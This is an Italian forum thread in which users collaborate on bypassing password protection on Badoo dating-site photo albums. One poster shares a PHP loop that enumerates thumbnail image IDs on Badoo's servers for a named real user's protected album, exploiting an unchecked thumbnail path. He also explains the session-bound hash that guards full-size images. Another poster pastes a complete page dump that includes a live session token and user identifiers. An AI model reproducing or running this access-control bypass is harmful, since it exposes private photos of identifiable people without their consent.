Foto protette badoo, la soluzione finale

[imported_kevinMitnick]

ora non funziona più il codice di uomosteriman hanno bloccato tutto qualcuno sa un nuovo metodo

 

[MrDarkest]

ne parliamo da una pagina intera, leggi prima di postare.

 

[Max84]

Invece di chiedere aiutateci a trovare qualcosa di utile,sono convinto che insieme troveremo altre soluzioni!Io continuo la mia ricerca,non appena avro' novita' significative le postero' qui,ciao ragazzi

 

[Robertof]

@kevinMitnick:
http://www.infernet-x.com/python/bypassare-le-password-delle-foto-protette-di-badoo-t-12458-3.html
Non mi piace il tuo comportamento.

 

[MrDarkest]

Ora basta, se leggo altre domande inutile su sto 3d lo chiudo e lo riapro quando si sa qualcosa.

 

[CrashOver]

asd io ve lo avevo detto che finiva cosi in meno di una settimana ^?^

 

[Robertof]

Post inutile (quello di CrashOver)..
Se non devi dire qualcosa di interessante allora risparmiatelo.

 

[V1R5]

asd io ve lo avevo detto che finiva cosi in meno di una settimana ^?^

Bravo hai vinto una bambola di sabbia...
Ora se ci fate il favore di evitare up inutili, e pazientate, magari noi provvediamo...

 

[imported_sisma]

avete notato che x le thumbinal non viene controllata nessuna variabile cc= o s1 o sold1, ecc?
è estremamente brutto lo so, e forse va anche fuori dall'etica del progetto in se... ma....
questa tipa: http://eu1.badoo.com/099778228/

una cosa del genere...

ob_start();
ob_implicit_flush();
$http = new CurlTool();
for ($i=235870;$i<=299999;$i++) {
  $buff = $http->fetchContent('http://p25.badoo.com/157/8/7/8/99778228/235865/'.$i.'_96.jpg');
  if (substr($buff,0,3) == 'GIF')
    echo "$i not found :( \n";
  else 
    echo "$i found :) \n";
  flush();
  ob_flush();
}

la directory (che poi tale non è xkè è una roba di mod_rewrite o simile visto che nn si tratta di apache) la si può ricavare da un altro reportage, tipo quello del cagnolone.
http://p25.badoo.com/157/8/7/8/99778228/235865/'.$i.'_96.jpg
235865 è il reportage
_96 sono tutte le thumbinal
_920 le foto grandi.. ma è un altra storia..


un altro esempio:
http://p1.badoo.com/160/5/6/1/113919383/258935/258937_920.jpg <- quì naturlamente 403
http://p1.badoo.com/160/5/6/1/113919383/258935/258937_96.jpg <- quì no!
relativi a questo reportage: http://eu1.badoo.com/0113919383/e258935

 

[MrDarkest]

E' vero, si vedo i thumbnail dell'album, le foto sono piccoline ma sono quelle

 

[luckylucio118]

Volevo kiedere uan cosa da ignorante. Sarebbe interessante o utile se aveste il codice html di una pagina di un reportage protetto? io ve lo posto, magari serve...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-type" content="text/html;charset=utf-8" /> <title> SOLO PER ALCUNE KE MERITANO... creato da te&nbsp;&mdash; Badoo</title> <link rel="stylesheet" href="http://images.badoo.com/1036/-/-/css/base.css" type="text/css" media="screen,projection,print" /> <link rel="stylesheet" href="http://images.badoo.com/1036/-/-/css/addition.css" type="text/css" media="screen,projection,print" /> <link rel="stylesheet" href="http://images.badoo.com/1036/-/-/css/photo-notes.css" type="text/css" /> <script type="text/javascript" src="http://images.badoo.com/1036/-/-/js/base.js"></script> <script type="text/javascript" src="http://images.badoo.com/1036/-/-/js/entry-edit.js"></script> </head> <body class="entry"> <div id="wrap"><div id="wrap1"> <!--[if lt IE 7]><div id="wrap2"><div id="wrap3"><div id="wrap4"><![endif]-->  <div id="head"> <!--[if lt IE 7]> <style type="text/css"> .header_pop_up .tl, .header_pop_up .tr, .header_pop_up .br, .header_pop_up .bl, .header_pop_up .tail { filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://images.badoo.com/1036/-/-/i/first_message.png',sizingMethod='crop'); zoom:1; background:none; } </style> <![endif]--> <p id="logo"><a href="http://eu1.badoo.com/" id="logotype"><img src="http://images.badoo.com/1036/-/-/i/logo.png" alt="Badoo" width="312" height="49" align="middle" /><!--<span></span>--></a></p>  <div id="menu"> <div id="account_menu"> <a href="http://eu1.badoo.com/" title="Torna alla Homepage" class="home"></a> <i>|</i> <div class="dropdown_menu"> <span class="dropdown_item_css"><a href="http://eu1.badoo.com/0115386616/" class="name dropdown_item">Milena</a><i></i></span><!--[if lt IE 7]><a class="dropdown_item_ie" href="http://eu1.badoo.com/0115386616/">Milena<i></i><table><tr><td><![endif]--> <div class="show_dropdown"> <ul> <li class="first"><a class="dropdown_item" href="http://eu1.badoo.com/0115386616/">Milena</a><i></i></li> <li><a href="http://eu1.badoo.com/">Homepage</a></li> <li><a href="http://eu1.badoo.com/0115386616/">Il tuo profilo</a></li> <li><a href="http://eu1.badoo.com/0115386616/settings/">Impostazioni</a></li> <li class="separate"><a href="http://eu1.badoo.com/0115386616/entry/create/">Crea un reportage&hellip;</a></li> </ul> </div> <!--[if lt IE 7]></td></tr></table></a><![endif]--> </div> <i>|</i> <div class="header_container"> <span class="contacts zero_messages" id="new_msg_container"> <a href="http://eu1.badoo.com/0115386616/contacts/">Messaggi</a> <span id="new_msg" class="messages_menu"><span><span> <a href="http://eu1.badoo.com/0115386616/contacts/message/94067804/"   target="my_115386616" id="a_your">0</a> </span></span></span> <a href="http://eu1.badoo.com/0115386616/contacts/message/94067804/"   id="a_your_s" class="text_new_message">nuovi</a> </span>  </div>  <i>|</i><a href="http://eu1.badoo.com/signout/">Esci</a> </div> <div id="action_menu"> <a href="http://eu1.badoo.com/search/">Trova nuova gente</a> <i>|</i><a href="http://eu1.badoo.com/vote/">Vota le foto</a> <i>|</i><a href="http://eu1.badoo.com/events/">Vedi gli eventi</a> </div> <span id="Baloon"><input type="hidden" id="f_baloon_ts" value="" /><input type="hidden" id="f_baloon_vars" value="host=87.245.192.46&amp;port=80&amp;session_name=s1&amp;s=1YgJBHewvtKLhj0dn62G5-3Iuf7cx4_b&amp;anketa_id=0&amp;user_id=115386616&amp;partner_id=1&amp;message_num=0&amp;swf_path=http://images.badoo.com/1036/-/-/flash/&amp;data_path=http://eu1.badoo.com/0115386616/contacts/&amp;sound=1&amp;type=baloon" /></span> <div class="menu_sep"> <div class="body_sep"> <div class="t"><b></b><i></i></div> <div class="b"><b></b><i></i></div> </div> </div> </div>      <div class="clear"></div> </div>  <div class="navpart">  <div class="arrow_back"><a href="http://eu1.badoo.com/0115386616/">Torna al profilo</a></div> <p class="entry_navigation"> <span class="closed_entry"><a href="http://eu1.badoo.com/0115386616/e340210">&larr; UNA VOLTA MI PIACEVA. MA ANKE ADESSO&hellip;</a></span><b>|</b><span><a href="http://eu1.badoo.com/0115386616/e340139">UN PO' SEXY...&nbsp;&rarr;</a></span> </p> <h1>SOLO PER ALCUNE KE MERITANO... <small>creato da <a href="http://eu1.badoo.com/0115386616/" class="name online">Te</a></small></h1> </div> <div class="fund">  <p class="entry_summary"> <span id="media_count" > <span id="media_count_text" class="total">8 foto</span><span class="separator">|</span> </span> <span class="add_more_icon"></span><a href="#add_photos_form" class="add_more add_photo">Aggiungi altre foto o video</a> </p> <div id="slider"><div id="scale"><div id="slide_me"> </div></div></div> <div class="untagged_holder"> <div class="ballon_untagged"> <div class="ibc"> <div class="ask"> <b><a href="http://eu1.badoo.com/photos/auto_barrel.phtml?entry_id=340180">4 amici in attesa di ricevere Tag</a></b> </div> <div> Clicca qui per iniziare a taggarli tutti.
</div> </div> <div class="ibt"><b></b></div> <div class="ibr"><b></b></div> <div class="ibb"><b></b></div> <div class="ibl"><b></b></div> </div> </div> <div id="photoset"> <div id="b_photos"> <div id="p340185" class="thumbs"><div><div><a href="http://eu1.badoo.com/0115386616/p340185" rel="#vi340185" rev="x|" title="" id="i340185"><img width="72" height="96" src="http://p50.badoo.com/158/7/9/7/115386616/340180_432978/340185_96.jpg?updated=1227376543" border="0" alt="" /></a><span class="control"><a href="http://eu1.badoo.com/0115386616/p340185/rotate/182?angle=270" class="rotate_ccw"></a><a href="http://eu1.badoo.com/0115386616/p340185/rotate/182" class="rotate_cw"></a><a href="http://eu1.badoo.com/0115386616/p340185/delete" class="remove"></a></span><br /><span class="description"><span class="fading"></span>&nbsp;</span></div></div></div><div id="p340187" class="thumbs"><div><div><a href="http://eu1.badoo.com/0115386616/p340187" rel="#vi340187" rev="x|" title="" id="i340187"><img width="72" height="96" src="http://p50.badoo.com/158/7/9/7/115386616/340180_432978/340187_96.jpg?updated=1227376552" border="0" alt="" /></a><span class="control"><a href="http://eu1.badoo.com/0115386616/p340187/rotate/182?angle=270" class="rotate_ccw"></a><a href="http://eu1.badoo.com/0115386616/p340187/rotate/182" class="rotate_cw"></a><a href="http://eu1.badoo.com/0115386616/p340187/delete" class="remove"></a></span><br /><span class="description"><span class="fading"></span>&nbsp;</span></div></div></div><div id="p340190" class="thumbs"><div><div><a href="http://eu1.badoo.com/0115386616/p340190" rel="#vi340190" rev="x|" title="" id="i340190"><img width="128" height="96" src="http://p50.badoo.com/158/7/9/7/115386616/340180_432978/340190_96.jpg?updated=1227376560" border="0" alt="" /></a><span class="control"><a href="http://eu1.badoo.com/0115386616/p340190/rotate/182?angle=270" class="rotate_ccw"></a><a href="http://eu1.badoo.com/0115386616/p340190/rotate/182" class="rotate_cw"></a><a href="http://eu1.badoo.com/0115386616/p340190/delete" class="remove"></a></span><br /><span class="description"><span class="fading"></span>&nbsp;</span></div></div></div><div id="p340192" class="thumbs"><div><div><a href="http://eu1.badoo.com/0115386616/p340192" rel="#vi340192" rev="x|" title="" id="i340192"><img width="72" height="96" src="http://p50.badoo.com/158/7/9/7/115386616/340180_432978/340192_96.jpg?updated=1227376566" border="0" alt="" /></a><span class="control"><a href="http://eu1.badoo.com/0115386616/p340192/rotate/182?angle=270" class="rotate_ccw"></a><a href="http://eu1.badoo.com/0115386616/p340192/rotate/182" class="rotate_cw"></a><a href="http://eu1.badoo.com/0115386616/p340192/delete" class="remove"></a></span><br /><span class="description"><span class="fading"></span>&nbsp;</span></div></div></div><div id="p340196" class="thumbs"><div><div><a href="http://eu1.badoo.com/0115386616/p340196" rel="#vi340196" rev="x|" title="" id="i340196"><img width="72" height="96" src="http://p50.badoo.com/158/7/9/7/115386616/340180_432978/340196_96.jpg?updated=1227376627" border="0" alt="" /></a><span class="control"><a href="http://eu1.badoo.com/0115386616/p340196/rotate/182?angle=270" class="rotate_ccw"></a><a href="http://eu1.badoo.com/0115386616/p340196/rotate/182" class="rotate_cw"></a><a href="http://eu1.badoo.com/0115386616/p340196/delete" class="remove"></a></span><br /><span class="description"><span class="fading"></span>&nbsp;</span></div></div></div><div id="p340199" class="thumbs"><div><div><a href="http://eu1.badoo.com/0115386616/p340199" rel="#vi340199" rev="x|" title="" id="i340199"><img width="72" height="96" src="http://p50.badoo.com/158/7/9/7/115386616/340180_432978/340199_96.jpg?updated=1227376638" border="0" alt="" /></a><span class="control"><a href="http://eu1.badoo.com/0115386616/p340199/rotate/182?angle=270" class="rotate_ccw"></a><a href="http://eu1.badoo.com/0115386616/p340199/rotate/182" class="rotate_cw"></a><a href="http://eu1.badoo.com/0115386616/p340199/delete" class="remove"></a></span><br /><span class="description"><span class="fading"></span>&nbsp;</span></div></div></div><div id="p340200" class="thumbs"><div><div><a href="http://eu1.badoo.com/0115386616/p340200" rel="#vi340200" rev="x|" title="" id="i340200"><img width="128" height="96" src="http://p50.badoo.com/158/7/9/7/115386616/340180_432978/340200_96.jpg?updated=1227376646" border="0" alt="" /></a><span class="control"><a href="http://eu1.badoo.com/0115386616/p340200/rotate/182?angle=270" class="rotate_ccw"></a><a href="http://eu1.badoo.com/0115386616/p340200/rotate/182" class="rotate_cw"></a><a href="http://eu1.badoo.com/0115386616/p340200/delete" class="remove"></a></span><br /><span class="description"><span class="fading"></span>&nbsp;</span></div></div></div><div id="p340202" class="thumbs"><div><div><a href="http://eu1.badoo.com/0115386616/p340202" rel="#vi340202" rev="x|" title="" id="i340202"><img width="72" height="96" src="http://p50.badoo.com/158/7/9/7/115386616/340180_432978/340202_96.jpg?updated=1227376653" border="0" alt="" /></a><span class="control"><a href="http://eu1.badoo.com/0115386616/p340202/rotate/182?angle=270" class="rotate_ccw"></a><a href="http://eu1.badoo.com/0115386616/p340202/rotate/182" class="rotate_cw"></a><a href="http://eu1.badoo.com/0115386616/p340202/delete" class="remove"></a></span><br /><span class="description"><span class="fading"></span>&nbsp;</span></div></div></div> <div class="thumbs_add"><div><div><a href="#add_photos_form" title=""><img class="add_more_photos" width="96" height="96" src="http://images.badoo.com/1036/-/-/i/blank.gif" border="0" alt="" /></a></div></div></div> </div> <form action="http://87.245.192.199/0115386616/e340180/upload/1" method="post" enctype="multipart/form-data" id="upload_form"> <input id="session_name" type="hidden" name="s1" value="1YgJBHewvtKLhj0dn62G5-3Iuf7cx4_b" /> <div class="b_addIssue"> <p class="add" id="add_photos_form"> <input type="hidden" id="upload_ws_url" name="upload_ws_url" value="http://87.245.192.199/0115386616/e340180/upload/1" /> <input type="hidden" name="fromview" value="1" /> <input type="hidden" name="self_domain" value="http://eu1.badoo.com/0115386616/" /> <input type="file" name="file" /> <input type="submit" name="submit" value="Aggiungi foto e video" /> </p>  </div> </form> </div>  <div class="clear"></div> <div id="SWFUpload"> <span id="js_str" title="Errore interno|Errore in upload o formato non supportato|File troppo grande, max: 200.0Mb |Caricamento...||Immagini|File Video|Immagini e video|Tutti i file|Fatto|In corso...|Upload non completato, chiudendo questa pagina perderai questi file."></span> <div id="p_upload_content"> <div id="upload-start"> <a href="#" class="tClose" title="Chiudi"></a> <h3>Carica foto e video dal tuo computer</h3> <div class="uploader"> <p class="close"><small>Scegli i file da caricare dal tuo computer.</small></p> <div class="ctrhint">Tieni premuto il tasto Ctrl per scegliere più file nello stesso momento.</div> <div class="cmdhint">Tieni premuto il tasto Ctrl per scegliere più di un file per volta.</div> <div class="add_files"> <button type="button" id="addFilesDialog" class="file_action">Cerca file da caricare</button> <p><small>L'upload non funziona,  <a href="#add_photos_form" id="try_classic">tenta il metodo semplice</a>.</small></p> <p> <small>Puoi aggiungere un massimo di <i>50</i> foto e video in ogni reportage. <br />
I formati accettati sono JPG, PNG, AVI e MPEG e la dimensione massima e' di 16 MB per le photos e 200 MB or 30minuti per i video.
</small> </p> </div> </div> <p class="upload_options"> <small>Altre opzioni di Upload:</small> <a href="#" class="sites hidden"><span></span>Da altri siti internet</a> <a href="#" class="webcam"><span></span>Webcam Shooter</a>  <a href="#" class="mobile hidden"><span></span>Upload Mobile</a> </p> </div> <div id="upload-process" class="hidden"> <a href="#" class="tClose" title="Chiudi"></a> <h3>Caricato <span id="loaded_percent">0%</span></h3> <div class="uploader"> <p class="close"> <small> Puoi aggiungere <i>50</i> altri file in qualsiasi istante durante l'upload.</small> <small class="hidden">Puoi aggiungere <i>1</i> altri file in qualunque istante durante l'upload.</small> <small class="hidden">Attendi</small> </p> <p class="close hidden"> <small>Upload dei file completato. Se vuoi, puoi aggiugnere altri <i>50</i> file o cliccare su Finisci.</small> <small class="hidden">Upload dei file completato. Se vuoi puoi aggiugnere altri <i>1</i> file o cliccare su Finisci.</small> <small class="hidden">Upload completato. Clicca su Finisci.</small> </p> <div class="uploadlist"> <div class="ulw"> <table class="filelist" id="upload-filelist"> <colgroup> <col align="center"> <col align="left" valign="middle"> </colgroup> <colgroup span="2" align="left" valign="middle"></colgroup>  </table> </div> </div> <div class="fl_actions"> <button type="button" id="addMoreFilesDialog" class="file_action">Aggiungi altri file</button> <button type="button" id="finishUpload" class="escape_action">Finisci</button> <small class="upload_status"><span id="files_uploaded_num">0</span> di <span id="files_toupload_num">1</span> file caricati</small> </div> </div> </div> <div id="webcam-shooter" class="hidden"> <a href="#" class="tClose" title="Chiudi"></a> <h3>Webcam Shooter</h3> <div class="uploader shooter"> <p class="close"><small>Se hai una webcam, puoi scattarti ed aggiungere una foto direttamente qui sul sito.</small></p> <div class="webcam_holder"> <div id="SWFWebcam"></div> </div> <div class="webcam_action"> <div id="take_shot"> <button type="button" id="takeShot" class="file_action" disabled="disabled">Fai una foto</button> </div> <div id="progress_shot" class="hidden"> <div class="cipher1"></div> </div> <div id="save_shot" class="hidden"> <button type="button" id="saveShot" class="file_action">Salva questa foto</button> <button type="button" id="tryShot" class="escape_action">Riprova</button> </div> <div id="uploading_shot" class="hidden"></div> </div> </div> <p class="upload_options"><small>Altre opzioni di Upload:</small> <a href="#" class="files"><span></span>Dal computer</a>  <a href="#" class="sites hidden"><span></span>Da altri siti internet</a> <a href="#" class="mobile hidden"><span></span>Upload Mobile</a></p> </div> <div id="mobile-upload" class="hidden"> <a href="#" class="tClose" title="Chiudi"></a> <h3>Upload Mobile</h3> <div class="uploader"> <p class="close"><small>Puoi caricare foto e video direttamente dal tuo telefonino.</small></p> <p class="mobile_address"><big>#email#</big></p> <div class="line"></div> <p class="first"><small>Invia un MMS o un email a questo indirizzo dal tuo telefonino con allegate foto e file video.</small></p> <p class="second"><small>Il file allegato sarà aggiunto al tuo profilo, secondo le tue <a href="">Impostazioni di upload Mobile</a></small></p> </div> <p class="upload_options"> <small>Altre opzioni di Upload:</small> <a href="#" class="files"><span></span>Dal computer</a> <a href="#" class="sites hidden"><span></span>Da altri siti internet</a> <a href="#" class="webcam"><span></span>Webcam Shooter</a> </p> </div> <div id="email-uploader" class="hidden"> <a href="#" class="tClose" title="Chiudi"></a> <h3>Carica via email</h3> <div class="uploader"> <p class="close"><small>Puoi caricare foto e video direttamente via email.</small></p> <a href="mailto:" class="email_uploader_l"><span></span></a> <div class="description_email">	Invia un email a questo indirizzo, con allegato il file della foto.<br />
Il file allegato sarà aggiunto sul tuo profilo.
</div> </div> <p class="upload_options"> <small>Altre opzioni di Upload:</small> <a href="#" class="files"><span></span>Dal computer</a> <a href="#" class="webcam"><span></span>Webcam Shooter</a> <a href="#" class="sites hidden"><span></span>Da altri siti internet</a> <a href="#" class="mobile hidden"><span></span>Upload Mobile</a> </p> </div> <div id="SWFUpload2" style="position:absolute;"></div> </div> </div> </div> <div class="optgroup"> <h4 class="tagged hidden" id="tagged_people">Taggati in questo reportage <span id="tagged_num">(0)</span></h4>     <h4>Copia link diretto</h4> <div class="anchor"><input type="text" value="http://eu1.badoo.com/0115386616/e340180" class="copy_text" size="40" /></div> <span id="clipboard_text" title="Copiato negli appunti"></span> <ul class="actions">  <li class="slideshow" id="slideshow"><span></span> <a href="http://eu1.badoo.com/0115386616/e340180/slideshow">Tutto schermo</a> <div id="slideshow_flash"><input type="hidden" id="slideshow_params" value="txt1=Tutto schermo&txt2=Visualizzazione normale&xmlLink=http%3A%2F%2Feu1.badoo.com%2F0115386616%2Fe340180%2Fslideshow-ws&startFrom=0" /></div> </li> </ul> <div class="informative"> <p>22 Novembre 2008.</p> </div> <div class="ruler"></div> <ul class="photoactions"> <li><a href="http://eu1.badoo.com/0115386616/e340180/edit">Modifica reportage</a></li> <li><a href="http://eu1.badoo.com/0115386616/e340180/edit?delete=1" id="entrydelete">Elimina</a></li> </ul> </div>  <div id="comments"> <h2>Commenti <small id="add_comment">(<a href="#comments" class="change edit">Aggiungi il tuo commento</a>)</small></h2>  <div id="add_comment_form" class="editing"> <div id="reply_form">  <form action="http://eu1.badoo.com/0115386616/e340180/comments/?return=http%3A%2F%2Feu1.badoo.com%2F0115386616%2Fe340180%3Fpage%3D1&amp;page=1" class="comment_form" id="comment_form" method="post"> <div class="cn tl"></div><div class="cn tr"></div>  <input type="hidden" name="thread" id="thread_id" value="0" /> <input type="hidden" name="photo" id="photo_id" value="0" /> <input type="hidden" name="photo_owner_id" id="photo_owner_id" value="0" /> <input type="hidden" id="current_page" value="1" /> <input type="hidden" name="page" id="page_num" value="0" /> <input type="hidden" name="comment_timer" id="comment_timer" value="0" /> <div class="comment_note"> <p>Questo commento sarà pubblico e dovrebbe riferirsi solamente a questo.</p>  </div> <div class="textarea"><fieldset><textarea name="comment" class="noreset" id="f_comment" cols="54" rows="6"></textarea></fieldset></div> <span id="f_comment_count" class="b_other">5000</span> <div class="submit"><input type="submit" name="post" id="post_comment" value="Aggiungi un commento"  /> <span class="error_wait" id="post_comment_error_wait" >Devi attendere <b>0</b>secondi prima di poter postare un nuovo commento.</span>  </div> <div class="cn bl"></div><div class="cn br"></div> </form> </div> </div>       </div>     <script type="text/javascript">
  vars.cc_photos={"i340185":["fF0UCg0cwRB\/gTe\/5pZKTUiBwDOSseyo9nd2hn1ZDt0","TDcLcbXf2u3TslTKbqZKyrJOPgf6Usfqma5WVlXlGDs"],"i340187":["6797s8PgFK-breIFk07p6OPxZ6MjFxaWlzE7wZthY2w","gS1giV\/dykHbRL3\/vPA3k4STgt5cswMYagGFJrUZl68"],"i340190":["jrxbs8D51MXFbdDAZpMn6JqjWBHiyIxy7EuEXRkEE9w","tdhPfVAcx53sI8VmmW8Lp2PAg-DjcJWy28h4rm9MGsE"],"i340192":["NuHedVDOSBrpqFpyfh04IBWGHYX4nqpHJc2dnrSpqbY","JYjYQv1M7JqgrFEd\/tXvR6gfr9difvQiC5h3SnYkcGA"],"i340196":["ntsvhqdibBt8HmZzUjKHIo2xZfNEwM\/-YURpVJKAL8s","SiQq2-Q4-vYFdPIttmTyE4PzQsY6JraOLazq6qr8hPI"],"i340199":["ARi756ZWEowP19Lb45e90b4GeaJRHZdOfIH1uOjJl5E","H1OzZ2hi-4o-t6P6g3tuJegFJCfLcSTqunxecb9xfbw"],"i340200":["PdRFE-Yg8RuW13S\/QTSmO5t4OAhJUFnVP9j-W99\/vaY","udsMwLAgPD6dX05dWXGlwhIRGL2cqE831PuDmKBXctw"],"i340202":["hkRth5HdMoZkLVo5VEGL6WiTYdOeQeUsN071cUpQrxI","oX\/0dxUSkCfkGBqIrWc8PujchmLM3CL\/zNZ-8di8U00"]};
  vars.expire=["51900", "http://eu1.badoo.com/0115386616/e340180/refresh-ws"];
  vars.base_domain=".badoo.com";
  vars.photo_owner_id="115386616";
  vars.photo_tag_service_url="";
  vars.photo_service=["http://eu1.badoo.com/0115386616/e340180/order-ws","http://eu1.badoo.com/0115386616/p",""];
  vars.comments_url="http://eu1.badoo.com/0115386616/e340180/comments/?photo=#photo_id#";
  vars.comments_str=["Eliminare questo commento?","Elimina", "o", "Annulla", "Elimino solo questo commento","Elimina intera discussione"];
  vars.photos_limit=[50,42];

  vars.upload_str={
   click_str: ["Clicca per aggiungere un testo&hellip;", "Clicca qui per modificare la descrizione&hellip;"],
   uploaded_str: "Caricati",
   descr_str: ["Annulla", "Salva modifiche"],
   delete_str:["Sicuro di voler interrompere l'upload?", "Interrompi upload", "o", "Annulla", "Saranno aggiunti solamente i file completati"],
   webcam_str:["Rilevamento Webcam...", "Nessuna webcam rilevata", "Tenta rilevamento webcam", "Upload in corso...", "Premi Allow per attivare la tua webcam:"]
  };

  vars.delete_str=["Elimina questa foto?","Elimina","o","Annulla"];
  vars.delete_entry_str=["Eliminare reportage?", "Elimina", "o", "Annulla"];
  vars.photo_str=["Chiudi","Ottieni link per questa foto","Denuncia questa foto","Link diretto a questa foto","Ottieni il link per questo video","Denuncia questo video","Link diretto per questo video","Codice per postare su pagina web o forum","Copia in appunti","Aggiungi descrizione","Salva modifiche","Aggiungi Gente che Conosci","Clicca per iniziare","Caricamento...","Replay","Mostra commenti","Torna alla foto"];
  vars.tag_str={
   tabs:["Gente che Conosci","Email"],
   quick:"Ricerca veloce per nome", enter:"Inserisci nome",
   email:["Email", "Inserisci indirizzo email", "Inserisci l'email della persona che vuoi taggare e gli invieremo un link:"],
   phone:["Numero di telefonino", "Inserisci numero di telefonino", "Inserisci il numero completo di questa persona, compreso il codice nazionale:","Dov'e' registrato il numero?"],
   icq:["ICQ", "Inserisci ICQ UIN", "Inserisci il UIN ICQ (numero) della persona che desideri taggare e gli invieremo un link:"],
   title_auto:"Chi è? Clicca per taggare questa persona.", buttons:{save:"Salva Tag", del:"Rimuovi tag", cancel:"Annulla"}, dialog:["Rimuovere tag?", "Rimuovi", "o", "Annulla"]
  };
  vars.continue_sharing_url="";
 </script>  <!--[if lt IE 7]></div></div></div><![endif]--> </div></div>  <div id="footer"><div id="footwrap"> <!--[if lt IE 7]><div id="fwrap1"><div id="fwrap2"><div id="fwrap3"><![endif]--> <p class="copyright">&copy; 2006-2008 Badoo Services Limited</p> <p class="onbadoo"><a href="http://eu1.badoo.com/search/?photo=&amp;location=0_0_0">14.922.334</a> persone iscritte a Badoo, <a href="http://eu1.badoo.com/search/?photo=&amp;location=0_0_0&amp;online=1">215.810</a> online adesso!</p> <p class="about"> <a href="http://eu1.badoo.com/about/">Tutto su Badoo</a> <a href="http://eu1.badoo.com/terms/">Condizioni di Utilizzo</a> <a href="http://eu1.badoo.com/privacy/">Privacy</a> <a href="http://eu1.badoo.com/guidelines/">Linee guida della Community</a>  <a href="http://eu1.badoo.com/help/">Aiuto</a> </p> <span id="f_sess" title="s1=1YgJBHewvtKLhj0dn62G5-3Iuf7cx4_b"></span> <!--[if lt IE 7]></div></div></div><![endif]--> </div></div>  
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
<script type="text/javascript">
	var pageTracker = _gat._getTracker("UA-1884719-1");
	pageTracker._setDomainName("eu1.badoo.com");
	pageTracker._initData();
	pageTracker._trackPageview();
</script>
  <script type="text/javascript">
vars=window.vars||{};

vars.dOvl={
	close_str:'Chiudi',
	title_str:'Caricamento...'
};




</script>
  </body> </html>

Edit by MrDarkest: E' meglio se tutto quel codice sta dentro il tag code ma mettilo tu la prossima volta

 

[MrDarkest]

Beh ad avere l'html di un reportage protetto ci arrivavamo anche noi, bastava che ne creassimo uno nel nostro account di badoo

 

[luckylucio118]

Hai ragione, mi è venuta questa sparata all'una di notte, capisci l'orario...

 

[nemnem]

Non sono sicuro:

-hanno cambiato nomi o server di appoggio per le foto in quanto nella cache di google si trovano ancora il codice e gli indirizzi, ma i file sono stati spostati o rimossi...non so!!!
-inserendo il codice nello script, esce l'elenco delle foto ma quando clicchi e si apre la finestra dà FORBIDDEN.....

alcuni esempi:

{"errno":0,"data":{"142911":{"url":"http:\/\/bphotos502.badoo.com\/507\/7\/1\/1\/1052366892\/144351\/142911_920.jpg?cc=5pKEt23cjTgAr83iA3ltvPofrUBN6GWx9eJHP4p82HQ&updated=1188312278"},"142904":{"url":"http:\/\/bphotos502.badoo.com\/507\/7\/1\/1\/1052366892\/144351\/142904_920.jpg?cc=\/k8G33KxV8pzwlEfXv3dOqelHud9WVSKl98hMFgOdLM&updated=1188312279"},"142908":{"url":"http:\/\/bphotos502.badoo.com\/507\/7\/1\/1\/1052366892\/144351\/142908_920.jpg?cc=dFnRzAi6ohA81lc41fgWviXzgD0WccrYrKNl80Hm3b8&updated=1188312278"},"144480":{"url":"http:\/\/bphotos502.badoo.com\/507\/7\/1\/1\/1052366892\/144351\/144480_920.jpg?cc=bdByDBuS6tWl2T5I2-1TVoUI\/Nu3PL8TGEqwLZvMFmA&updated=1188436501"},"144482":{"url":"http:\/\/bphotos502.badoo.com\/507\/7\/1\/1\/1052366892\/144351\/144482_920.jpg?cc=-AorT-O-lRA7nG5AVBtMHRwxp6vqTKIDsHqa8czYdAM&updated=1188436501"},"144484":{"url":"http:\/\/bphotos502.badoo.com\/507\/7\/1\/1\/1052366892\/144351\/144484_920.jpg?cc=4xdlVGDiyWV4sK5WBmK2zLPaE1gW1sSSZ6eqaEHmawI&updated=1188436501"},"144488":{"url":"http:\/\/bphotos502.badoo.com\/507\/7\/1\/1\/1052366892\/144351\/144488_920.jpg?cc=WGjZYw5g9LEI9hnQXlUQykCb0Z99s1uGZnVLbtAMR3c&updated=1188436501"},"144492":{"url":"http:\/\/bphotos502.badoo.com\/507\/7\/1\/1\/1052366892\/144351\/144492_920.jpg?cc=lHfZrkRkhcMaO3EI5r20Wlrrk8YCcJH-xaAqlAc5iEw&updated=1188436501"},"144494":{"url":"http:\/\/bphotos502.badoo.com\/507\/7\/1\/1\/1052366892\/144351\/144494_920.jpg?cc=ATyV04Bwe0Za0hAcN5PF0aH7Q-RF49g3SsbwjadfMJc&updated=1188436323"},"144496":{"url":"http:\/\/bphotos502.badoo.com\/507\/7\/1\/1\/1052366892\/144351\/144496_920.jpg?cc=WlHhEqdCAuMoaa-jvlcGQqg-OVg\/SflskAM9iT1BpSw&updated=1188436323"}}}

 

[MrDarkest]

Secondo me hanno messo un controllo sull'autenticazione per accedere alle foto dal server, forse solo chi è autenticato come membro dello staff di badoo può accedere alle foto cosi. Boh

 

[imported_sisma]

il forbidden non è xkè non esiste il file.
è xkè non è verificato questo hash:
es:
cc=4xdlVGDiyWV4sK5WBmK2zLPaE1gW1sSSZ6eqaEHmawI

l'hash che trovi sui link da google è generato sulla sessione creata x googlebot, quando tu accedi, sei su un altra sessione.. x te l'hash da inviare è diverso... inviando quello sbagliato ti da 403.
Per capire meglio puoi fare una prova:
creati un archivio con password,
entra da mozilla, metti la password e copiati li link della jpg con tutto l'hash.
se tenti di aprirla naturalmetne si carica senza problemi.
apri internet explorer, incolla il link: 403 Forbidden.
ritorna su firefox: si riapre.

poi bada che quello che vedi nell'url tipo 507\7\1\1\10245637\45654_920.jpg non sono directory.. è un sistema di rewrite al volo dell'url.
sono vere e proprie variabili che vengono gestite dall'applicazione lato server.

Morale della favola.. per fare le cose xbene serve l'hash.. e a dire che è dura mi sembra anche un pò poco.

Naturalmente questa è l'idea che mi sono fatto io... potrei anche sbagliarmi... giù di brainstorming

ps: voi che ci sbattete da più tempo, qual'è l'uso che fa il sistema di refresh-ws, a che serve normalmente?
visto che ritorna dati json, dov'è usato? nello slideshow?
che tra l'altro ritornava la lista... senza lista l'hash dove lo metti.. gh

ps2: piccolo aggiornamento.
sembra ci siano 2 preview... avete presente quando esce nell'anteprima una foto + grande e le altre piccoline?
beh: _96 thumb piccina (96 è proprio l'altezza in pixel)
_48 ancora + piccola (48 px)
